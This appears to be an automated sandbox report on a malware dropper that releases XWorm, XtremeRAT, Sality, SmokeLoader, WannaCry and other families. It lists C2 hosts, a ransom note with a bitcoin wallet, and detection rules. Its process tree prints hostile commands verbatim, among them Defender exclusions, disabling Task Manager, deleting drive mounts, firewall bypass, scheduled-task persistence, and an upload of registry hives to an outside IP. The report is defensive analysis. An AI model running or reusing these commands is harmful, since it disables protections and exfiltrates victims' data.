modiloader | 1d2822a34aa548e8e890e33b66cf6722e0bdb82944dae1b53feaf902790c5254

Resubmissions

11-04-2024 15:50

240411-tacvysaa6y 10

11-04-2024 14:37

240411-ry8lesde42 10

09-04-2024 17:30

240409-v3hscaha8y 10

08-01-2024 17:24

240108-vy3xqaecgj 10

Analysis

max time kernel
15s
max time network
317s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
11-04-2024 15:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fatalerror.exe
Size

19.9MB
MD5

62df3bbc2aaeddab1942f1ed0b2db429
SHA1

a31b35f778fa5bec3a09b215db38d891fa45510d
SHA256

1d2822a34aa548e8e890e33b66cf6722e0bdb82944dae1b53feaf902790c5254
SHA512

6ab2b5f72db8b6e386c142e330807bd2eec9983c04ab034c4011c053a5be0294514f06693c66a9f8b6bcc7b60d1646810f7c2cda4379b6cdbda2f9d5d047bfdd
SSDEEP

393216:jDLmcuBUDiQv3FlGzbhweRo3W6aJZCN7TW/0k6CN1VWtES:jflGw3F6dwijJZCN2sA1Vc

Score

10^/10

modiloader sality smokeloader wannacry xtremerat xworm backdoor discovery evasion persistence ransomware rat spyware trojan upx worm

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

TcK6iKFmjhETcMYi

Attributes

install_file
USB.exe
pastebin_url
https://pastebin.com/raw/RqgnZ1zk

aes.plain

Extracted

Family

xworm

tr1.localto.net:39186

Attributes

Install_directory
%ProgramData%
install_file
Microsoft Storge.exe

Extracted

Family

xtremerat

antonioxx.no-ip.org

Extracted

Family

sality

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Path

C:\Users\Admin\Desktop\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

Detect XtremeRAT payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2592-236-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral2/memory/824-241-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral2/memory/2592-245-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral2/memory/824-311-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat

Detect Xworm Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Synapse X.exe	family_xworm
behavioral2/memory/548-31-0x0000000000260000-0x0000000000270000-memory.dmp	family_xworm
C:\Users\Admin\Desktop\XClient.exe	family_xworm
behavioral2/memory/376-89-0x0000000000EF0000-0x0000000000F24000-memory.dmp	family_xworm

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Sality
Sality is backdoor written in C++, first discovered in 2003.
backdoor sality
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
XtremeRAT
The XtremeRAT was developed by xtremecoder and has been available since at least 2010, and written in Delphi.
persistence spyware rat xtremerat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

ModiLoader Second Stage 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\ayhost.exe	modiloader_stage2
behavioral2/memory/3700-349-0x0000000000400000-0x0000000000417000-memory.dmp	modiloader_stage2
behavioral2/memory/3700-418-0x0000000000400000-0x0000000000417000-memory.dmp	modiloader_stage2

Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3248 netsh.exe

pid	process
3248	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

fatalerror.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	fatalerror.exe

Executes dropped EXE 3 IoCs

Processes:

Synapse X.exeTrihydridoarsenic.exeXClient.exe

pid process

548 Synapse X.exe
2152 Trihydridoarsenic.exe
376 XClient.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

1160 icacls.exe

pid	process
548	Synapse X.exe
2152	Trihydridoarsenic.exe
376	XClient.exe

pid	process
1160	icacls.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2592-224-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/2592-227-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/2592-236-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/2592-234-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/2592-235-0x00000000023D0000-0x000000000345E000-memory.dmp	upx
behavioral2/memory/2592-239-0x00000000023D0000-0x000000000345E000-memory.dmp	upx
behavioral2/memory/824-241-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/2592-240-0x00000000023D0000-0x000000000345E000-memory.dmp	upx
behavioral2/memory/2592-242-0x00000000023D0000-0x000000000345E000-memory.dmp	upx
behavioral2/memory/2592-245-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral2/memory/824-311-0x0000000010000000-0x0000000010060000-memory.dmp	upx

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

fatalerror.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Synapse X = "C:\\Users\\Admin\\Desktop\\Synapse X.exe"	fatalerror.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trihydridoarsenic = "C:\\Users\\Admin\\Desktop\\Trihydridoarsenic.exe"	fatalerror.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\Desktop\\XClient.exe"	fatalerror.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

33 5.tcp.eu.ngrok.io
128 5.tcp.eu.ngrok.io
228 5.tcp.eu.ngrok.io
310 5.tcp.eu.ngrok.io
19 pastebin.com
20 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2808 824 WerFault.exe svchost.exe
3316 824 WerFault.exe svchost.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3316 schtasks.exe
4396 schtasks.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

1620 tasklist.exe
2932 tasklist.exe
5344 tasklist.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4500 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1856 notepad.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

180 PING.EXE

flow	ioc
33	5.tcp.eu.ngrok.io
128	5.tcp.eu.ngrok.io
228	5.tcp.eu.ngrok.io
310	5.tcp.eu.ngrok.io
19	pastebin.com
20	pastebin.com

flow	ioc
16	ip-api.com

pid	pid_target	process	target process
2808	824	WerFault.exe	svchost.exe
3316	824	WerFault.exe	svchost.exe

pid	process
3316	schtasks.exe
4396	schtasks.exe

pid	process
1620	tasklist.exe
2932	tasklist.exe
5344	tasklist.exe

pid	process
4500	reg.exe

pid	process
1856	notepad.exe

pid	process
180	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1100	powershell.exe
1100	powershell.exe
2088	powershell.exe
2088	powershell.exe
1792	powershell.exe
1792	powershell.exe
4428	powershell.exe
4428	powershell.exe
4428	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exeSynapse X.exepowershell.exeXClient.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	548	Synapse X.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	376	XClient.exe
Token: SeDebugPrivilege	4428	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

fatalerror.exe

description	pid	process	target process
PID 1188 wrote to memory of 1100	1188	fatalerror.exe	svchost.exe
PID 1188 wrote to memory of 1100	1188	fatalerror.exe	svchost.exe
PID 1188 wrote to memory of 548	1188	fatalerror.exe	Synapse X.exe
PID 1188 wrote to memory of 548	1188	fatalerror.exe	Synapse X.exe
PID 1188 wrote to memory of 2088	1188	fatalerror.exe	powershell.exe
PID 1188 wrote to memory of 2088	1188	fatalerror.exe	powershell.exe
PID 1188 wrote to memory of 2152	1188	fatalerror.exe	Trihydridoarsenic.exe
PID 1188 wrote to memory of 2152	1188	fatalerror.exe	Trihydridoarsenic.exe
PID 1188 wrote to memory of 2152	1188	fatalerror.exe	Trihydridoarsenic.exe
PID 1188 wrote to memory of 1792	1188	fatalerror.exe	powershell.exe
PID 1188 wrote to memory of 1792	1188	fatalerror.exe	powershell.exe
PID 1188 wrote to memory of 376	1188	fatalerror.exe	XClient.exe
PID 1188 wrote to memory of 376	1188	fatalerror.exe	XClient.exe
PID 1188 wrote to memory of 4428	1188	fatalerror.exe	powershell.exe
PID 1188 wrote to memory of 4428	1188	fatalerror.exe	powershell.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

5404 attrib.exe
5896 attrib.exe

pid	process
5404	attrib.exe
5896	attrib.exe

C:\Users\Admin\AppData\Local\Temp\fatalerror.exe
"C:\Users\Admin\AppData\Local\Temp\fatalerror.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Synapse X.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Users\Admin\Desktop\Synapse X.exe
"C:\Users\Admin\Desktop\Synapse X.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Synapse X.exe'
3⤵
PID:2928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Synapse X.exe'
3⤵
PID:2696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Trihydridoarsenic.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Users\Admin\Desktop\Trihydridoarsenic.exe
"C:\Users\Admin\Desktop\Trihydridoarsenic.exe"
2⤵
- Executes dropped EXE
PID:2152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD hkcu\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t reg_dword /d 1 /f
3⤵
PID:1860

C:\Windows\SysWOW64\reg.exe
REG ADD hkcu\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t reg_dword /d 1 /f
4⤵
- Modifies registry key
PID:4500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start mspaint
3⤵
PID:1308

C:\Windows\SysWOW64\mspaint.exe
mspaint
4⤵
PID:4356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start taskmgr
3⤵
PID:5940

C:\Windows\SysWOW64\Taskmgr.exe
taskmgr
4⤵
PID:1628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol a: /d
3⤵
PID:4456

C:\Windows\SysWOW64\mountvol.exe
mountvol a: /d
4⤵
PID:2060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol b: /d
3⤵
PID:5696

C:\Windows\SysWOW64\mountvol.exe
mountvol b: /d
4⤵
PID:184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol c: /d
3⤵
PID:4772

C:\Windows\SysWOW64\mountvol.exe
mountvol c: /d
4⤵
PID:3364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XClient.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Users\Admin\Desktop\XClient.exe
"C:\Users\Admin\Desktop\XClient.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:376

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Storge" /tr "C:\ProgramData\Microsoft Storge.exe"
3⤵
- Creates scheduled task(s)
PID:3316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\0x000a0000000133a8-19.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4428

C:\Users\Admin\Desktop\0x000a0000000133a8-19.exe
"C:\Users\Admin\Desktop\0x000a0000000133a8-19.exe"
2⤵
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe'
2⤵
PID:4956

C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe
"C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe"
2⤵
PID:3516

C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe
"C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe"
3⤵
PID:2592

C:\Windows\SysWOW64\svchost.exe
svchost.exe
4⤵
PID:824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 824 -s 480
5⤵
- Program crash
PID:2808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 824 -s 488
5⤵
- Program crash
PID:3316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
4⤵
PID:3204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\01c06da01d03aba73f575da905366dad.exe'
2⤵
PID:2640

C:\Users\Admin\Desktop\01c06da01d03aba73f575da905366dad.exe
"C:\Users\Admin\Desktop\01c06da01d03aba73f575da905366dad.exe"
2⤵
PID:5044

C:\Users\Admin\d3s3Jf2gX6.exe
C:\Users\Admin\d3s3Jf2gX6.exe
3⤵
PID:1116

C:\Users\Admin\noapav.exe
"C:\Users\Admin\noapav.exe"
4⤵
PID:1780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c tasklist&&del d3s3Jf2gX6.exe
4⤵
PID:5068

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:1620

C:\Users\Admin\ayhost.exe
C:\Users\Admin\ayhost.exe
3⤵
PID:3700

C:\Users\Admin\bahost.exe
C:\Users\Admin\bahost.exe
3⤵
PID:5400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
4⤵
PID:6128

C:\Users\Admin\djhost.exe
C:\Users\Admin\djhost.exe
3⤵
PID:1008

C:\Users\Admin\ekhost.exe
C:\Users\Admin\ekhost.exe
3⤵
PID:624

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c tasklist&&del ekhost.exe
4⤵
PID:4636

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5344

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c tasklist&&del 01c06da01d03aba73f575da905366dad.exe
3⤵
PID:4160

C:\Windows\SysWOW64\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:2932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\2door.exe'
2⤵
PID:1780

C:\Users\Admin\Desktop\2door.exe
"C:\Users\Admin\Desktop\2door.exe"
2⤵
PID:636

C:\Users\Admin\Desktop\2door.exe
"C:\Users\Admin\Desktop\2door.exe"
3⤵
PID:4404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\2MASS J07225830-2546030.exe'
2⤵
PID:4352

C:\Users\Admin\Desktop\2MASS J07225830-2546030.exe
"C:\Users\Admin\Desktop\2MASS J07225830-2546030.exe"
2⤵
PID:4544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\3e71d2e715046c0f2e8241cdccbefe4b.exe'
2⤵
PID:4468

C:\Users\Admin\Desktop\3e71d2e715046c0f2e8241cdccbefe4b.exe
"C:\Users\Admin\Desktop\3e71d2e715046c0f2e8241cdccbefe4b.exe"
2⤵
PID:4008

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WjWgdwObUx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpAC44.tmp"
3⤵
- Creates scheduled task(s)
PID:4396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\8A184A4C0C3FBB38A42095F653EA1063A07F75D3DE1A1.exe'
2⤵
PID:2268

C:\Users\Admin\Desktop\8A184A4C0C3FBB38A42095F653EA1063A07F75D3DE1A1.exe
"C:\Users\Admin\Desktop\8A184A4C0C3FBB38A42095F653EA1063A07F75D3DE1A1.exe"
2⤵
PID:908

C:\Users\Admin\AppData\Roaming\SearchHost.exe
"C:\Users\Admin\AppData\Roaming\SearchHost.exe"
3⤵
PID:5756

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SearchHost.exe" "SearchHost.exe" ENABLE
4⤵
- Modifies Windows Firewall
PID:3248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe'
2⤵
PID:1428

C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe
"C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe"
2⤵
PID:456

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\Admin\AppData\Local\Temp\\kttlfltq.exe "C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe"
3⤵
PID:4688

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
4⤵
- Runs ping.exe
PID:180

C:\Users\Admin\AppData\Local\Temp\kttlfltq.exe
C:\Users\Admin\AppData\Local\Temp\\kttlfltq.exe "C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe"
4⤵
PID:2180

\??\c:\Program Files\elagb\wxa.exe
"c:\Program Files\elagb\wxa.exe" "c:\Program Files\elagb\wxaow.dll",Compliance C:\Users\Admin\AppData\Local\Temp\kttlfltq.exe
5⤵
PID:4640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\b5bf9b891fdd046d626082bad71ef887a9fcafca9cdfd6887d2e60ef6d4a0462.exe'
2⤵
PID:2124

C:\Users\Admin\Desktop\b5bf9b891fdd046d626082bad71ef887a9fcafca9cdfd6887d2e60ef6d4a0462.exe
"C:\Users\Admin\Desktop\b5bf9b891fdd046d626082bad71ef887a9fcafca9cdfd6887d2e60ef6d4a0462.exe"
2⤵
PID:4240

C:\Windows\syspolrvcs.exe
C:\Windows\syspolrvcs.exe
3⤵
PID:4632

C:\Users\Admin\AppData\Local\Temp\2803310328.exe
C:\Users\Admin\AppData\Local\Temp\2803310328.exe
4⤵
PID:1932

C:\Users\Admin\AppData\Local\Temp\1854621541.exe
C:\Users\Admin\AppData\Local\Temp\1854621541.exe
5⤵
PID:1004

C:\Users\Admin\AppData\Local\Temp\1735816838.exe
C:\Users\Admin\AppData\Local\Temp\1735816838.exe
5⤵
PID:6100

C:\Users\Admin\AppData\Local\Temp\3202426574.exe
C:\Users\Admin\AppData\Local\Temp\3202426574.exe
5⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\107026337.exe
C:\Users\Admin\AppData\Local\Temp\107026337.exe
4⤵
PID:5956

C:\Users\Admin\AppData\Local\Temp\1259121635.exe
C:\Users\Admin\AppData\Local\Temp\1259121635.exe
4⤵
PID:1404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\cdm.exe'
2⤵
PID:4632

C:\Users\Admin\Desktop\cdm.exe
"C:\Users\Admin\Desktop\cdm.exe"
2⤵
PID:964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\check_Registry.exe'
2⤵
PID:2124

C:\Users\Admin\Desktop\check_Registry.exe
"C:\Users\Admin\Desktop\check_Registry.exe"
2⤵
PID:1568

C:\Users\Admin\AppData\Local\Temp\kape.exe
"C:\Users\Admin\AppData\Local\Temp\kape.exe" --tsource C: --tdest OAILVCNY\Target --target RegistryHivesUser --scs 79.174.93.239 --scp 22 --scu smartfiles --scpw "testsSBfilestransfer!!!!!" --scd uploads --vhdx VHDXInfo
3⤵
PID:5516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Choc.exe'
2⤵
PID:4440

C:\Users\Admin\Desktop\Choc.exe
"C:\Users\Admin\Desktop\Choc.exe"
2⤵
PID:5820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\ColorCs.exe'
2⤵
PID:5844

C:\Users\Admin\Desktop\ColorCs.exe
"C:\Users\Admin\Desktop\ColorCs.exe"
2⤵
PID:5304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe'
2⤵
PID:5288

C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
2⤵
PID:5772

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:5404

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:1160

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
3⤵
PID:5448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 131941712850795.bat
3⤵
PID:736

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
3⤵
- Views/modifies file attributes
PID:5896

C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
3⤵
PID:6048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\EGN RU1.exe'
2⤵
PID:5828

C:\Users\Admin\Desktop\EGN RU1.exe
"C:\Users\Admin\Desktop\EGN RU1.exe"
2⤵
PID:5884

C:\Users\Admin\AppData\Local\Temp\sustem32.exe
"C:\Users\Admin\AppData\Local\Temp\sustem32.exe"
3⤵
PID:5320

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hyperwebfont\JNbMKTHQeeisaNE5gWwcccFtQuC.vbe"
4⤵
PID:2104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hyperwebfont\yIgYU9c1z9H1xn6Tye0KRsv0DdNxWg4dhb8r4Zd.bat" "
5⤵
PID:5192

C:\hyperwebfont\portWebsavesRuntimeSvc.exe
"C:\hyperwebfont/portWebsavesRuntimeSvc.exe"
6⤵
PID:1472

C:\Users\Admin\AppData\Local\Temp\EGN RU.exe
"C:\Users\Admin\AppData\Local\Temp\EGN RU.exe"
3⤵
PID:5480

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\hwid.ini
4⤵
- Opens file in notepad (likely ransom note)
PID:1856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\fauxinity.exe'
2⤵
PID:6096

C:\Users\Admin\Desktop\fauxinity.exe
"C:\Users\Admin\Desktop\fauxinity.exe"
2⤵
PID:5784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Getaparane.exe'
2⤵
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 824 -ip 824
1⤵
PID:5068

